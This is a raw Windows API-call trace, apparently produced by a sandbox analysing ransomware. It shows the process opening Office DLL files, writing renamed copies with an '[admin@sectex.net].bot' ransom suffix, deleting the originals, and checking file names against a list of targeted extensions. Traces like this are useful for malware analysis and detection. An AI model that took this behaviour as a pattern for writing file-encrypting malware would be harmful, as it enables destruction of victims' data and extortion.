	[0055.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.552] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.552] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.552] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.552] GetLastError () returned 0x0
	[0055.553] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x305a8, lpOverlapped=0x0) returned 1
	[0055.566] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x305b0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x305b0, lpOverlapped=0x0) returned 1
	[0055.569] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.569] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0055.569] SetEndOfFile (hFile=0x158) returned 1
	[0055.569] CloseHandle (hObject=0x158) returned 1
	[0055.570] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.570] SetEndOfFile (hFile=0x234) returned 1
	[0055.571] CloseHandle (hObject=0x234) returned 1
	[0055.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.572] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 1
	[0055.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.572] lstrlenW (lpString=".doc") returned 4
	[0055.572] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.572] lstrlenW (lpString=".docx") returned 5
	[0055.572] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0055.572] lstrlenW (lpString=".pdf") returned 4
	[0055.572] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.572] lstrlenW (lpString=".xls") returned 4
	[0055.572] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.572] lstrlenW (lpString=".xlsx") returned 5
	[0055.572] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0055.572] lstrlenW (lpString=".ppt") returned 4
	[0055.572] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.572] lstrlenW (lpString=".zip") returned 4
	[0055.572] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.572] lstrlenW (lpString=".rar") returned 4
	[0055.572] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.572] lstrlenW (lpString=".bz2") returned 4
	[0055.572] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.572] lstrlenW (lpString=".7z") returned 3
	[0055.572] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.573] lstrlenW (lpString=".dbf") returned 4
	[0055.573] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.573] lstrlenW (lpString=".1cd") returned 4
	[0055.573] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.573] lstrlenW (lpString=".jpg") returned 4
	[0055.573] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.573] lstrlenW (lpString=".doc") returned 4
	[0055.573] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString=".docx") returned 5
	[0055.573] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0055.573] lstrlenW (lpString=".pdf") returned 4
	[0055.573] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString=".xls") returned 4
	[0055.573] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString=".xlsx") returned 5
	[0055.573] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0055.573] lstrlenW (lpString=".ppt") returned 4
	[0055.573] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.573] lstrlenW (lpString=".zip") returned 4
	[0055.573] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString=".rar") returned 4
	[0055.573] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.573] lstrlenW (lpString=".bz2") returned 4
	[0055.573] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.573] lstrlenW (lpString=".7z") returned 3
	[0055.573] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.574] lstrlenW (lpString=".dbf") returned 4
	[0055.574] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.574] lstrlenW (lpString=".1cd") returned 4
	[0055.574] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72
	[0055.574] lstrlenW (lpString=".jpg") returned 4
	[0055.574] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.574] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0055.574] lstrlenW (lpString="ACEODBCI.DLL") returned 12
	[0055.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.575] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=52656) returned 1
	[0055.575] CloseHandle (hObject=0x234) returned 1
	[0055.575] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 0x20
	[0055.575] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.575] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.575] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.576] GetLastError () returned 0x0
	[0055.576] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0xcdb0, lpOverlapped=0x0) returned 1
	[0055.580] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xcdc0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xcdc0, lpOverlapped=0x0) returned 1
	[0055.581] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.582] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.582] SetEndOfFile (hFile=0x158) returned 1
	[0055.582] CloseHandle (hObject=0x158) returned 1
	[0055.582] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.582] SetEndOfFile (hFile=0x234) returned 1
	[0055.583] CloseHandle (hObject=0x234) returned 1
	[0055.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.583] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 1
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.584] lstrlenW (lpString=".doc") returned 4
	[0055.584] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString=".docx") returned 5
	[0055.584] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0055.584] lstrlenW (lpString=".pdf") returned 4
	[0055.584] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString=".xls") returned 4
	[0055.584] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString=".xlsx") returned 5
	[0055.584] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0055.584] lstrlenW (lpString=".ppt") returned 4
	[0055.584] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.584] lstrlenW (lpString=".zip") returned 4
	[0055.584] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString=".rar") returned 4
	[0055.584] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString=".bz2") returned 4
	[0055.584] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.584] lstrlenW (lpString=".7z") returned 3
	[0055.584] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.584] lstrlenW (lpString=".dbf") returned 4
	[0055.584] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.584] lstrlenW (lpString=".1cd") returned 4
	[0055.584] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.584] lstrlenW (lpString=".jpg") returned 4
	[0055.584] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.585] lstrlenW (lpString=".doc") returned 4
	[0055.585] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.585] lstrlenW (lpString=".docx") returned 5
	[0055.585] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0055.585] lstrlenW (lpString=".pdf") returned 4
	[0055.585] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.585] lstrlenW (lpString=".xls") returned 4
	[0055.585] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.585] lstrlenW (lpString=".xlsx") returned 5
	[0055.585] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0055.585] lstrlenW (lpString=".ppt") returned 4
	[0055.585] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.585] lstrlenW (lpString=".zip") returned 4
	[0055.585] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.585] lstrlenW (lpString=".rar") returned 4
	[0055.585] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.585] lstrlenW (lpString=".bz2") returned 4
	[0055.585] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.585] lstrlenW (lpString=".7z") returned 3
	[0055.585] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.585] lstrlenW (lpString=".dbf") returned 4
	[0055.585] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.585] lstrlenW (lpString=".1cd") returned 4
	[0055.585] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned 73
	[0055.585] lstrlenW (lpString=".jpg") returned 4
	[0055.585] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.586] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0055.586] lstrlenW (lpString="ACERECR.DLL") returned 11
	[0055.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.586] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=20944) returned 1
	[0055.586] CloseHandle (hObject=0x234) returned 1
	[0055.586] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 0x20
	[0055.586] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.586] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.586] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0055.587] GetLastError () returned 0x0
	[0055.587] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x51d0, lpOverlapped=0x0) returned 1
	[0055.593] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0x51e0, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0x51e0, lpOverlapped=0x0) returned 1
	[0055.594] ReadFile (in: hFile=0x234, lpBuffer=0xb2d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa7dfed4, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesRead=0xa7dfed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.594] WriteFile (in: hFile=0x158, lpBuffer=0xb2d0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa7dfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb2d0020*, lpNumberOfBytesWritten=0xa7dfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0055.594] SetEndOfFile (hFile=0x158) returned 1
	[0055.594] CloseHandle (hObject=0x158) returned 1
	[0055.594] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa7dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.594] SetEndOfFile (hFile=0x234) returned 1
	[0055.595] CloseHandle (hObject=0x234) returned 1
	[0055.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.595] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll")) returned 1
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString=".doc") returned 4
	[0055.596] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString=".docx") returned 5
	[0055.596] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0055.596] lstrlenW (lpString=".pdf") returned 4
	[0055.596] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString=".xls") returned 4
	[0055.596] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString=".xlsx") returned 5
	[0055.596] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0055.596] lstrlenW (lpString=".ppt") returned 4
	[0055.596] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString=".zip") returned 4
	[0055.596] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString=".rar") returned 4
	[0055.596] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString=".bz2") returned 4
	[0055.596] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.596] lstrlenW (lpString=".7z") returned 3
	[0055.596] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString=".dbf") returned 4
	[0055.596] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString=".1cd") returned 4
	[0055.596] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString=".jpg") returned 4
	[0055.596] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.596] lstrlenW (lpString=".doc") returned 4
	[0055.597] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0055.597] lstrlenW (lpString=".docx") returned 5
	[0055.597] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0055.597] lstrlenW (lpString=".pdf") returned 4
	[0055.597] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0055.597] lstrlenW (lpString=".xls") returned 4
	[0055.597] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0055.597] lstrlenW (lpString=".xlsx") returned 5
	[0055.597] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0055.597] lstrlenW (lpString=".ppt") returned 4
	[0055.597] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0055.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.597] lstrlenW (lpString=".zip") returned 4
	[0055.597] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0055.597] lstrlenW (lpString=".rar") returned 4
	[0055.597] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0055.597] lstrlenW (lpString=".bz2") returned 4
	[0055.597] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0055.597] lstrlenW (lpString=".7z") returned 3
	[0055.597] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0055.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.597] lstrlenW (lpString=".dbf") returned 4
	[0055.597] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0055.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.597] lstrlenW (lpString=".1cd") returned 4
	[0055.597] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0055.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned 72
	[0055.597] lstrlenW (lpString=".jpg") returned 4
	[0055.597] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0055.597] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0055.598] lstrlenW (lpString="ACEWSTR.DLL") returned 11
	[0055.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234
	[0055.598] GetFileSizeEx (in: hFile=0x234, lpFileSize=0xa7dff1c | out: lpFileSize=0xa7dff1c*=862608) returned 1
	[0055.598] CloseHandle (hObject=0x234) returned 1
	[0055.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 0x20
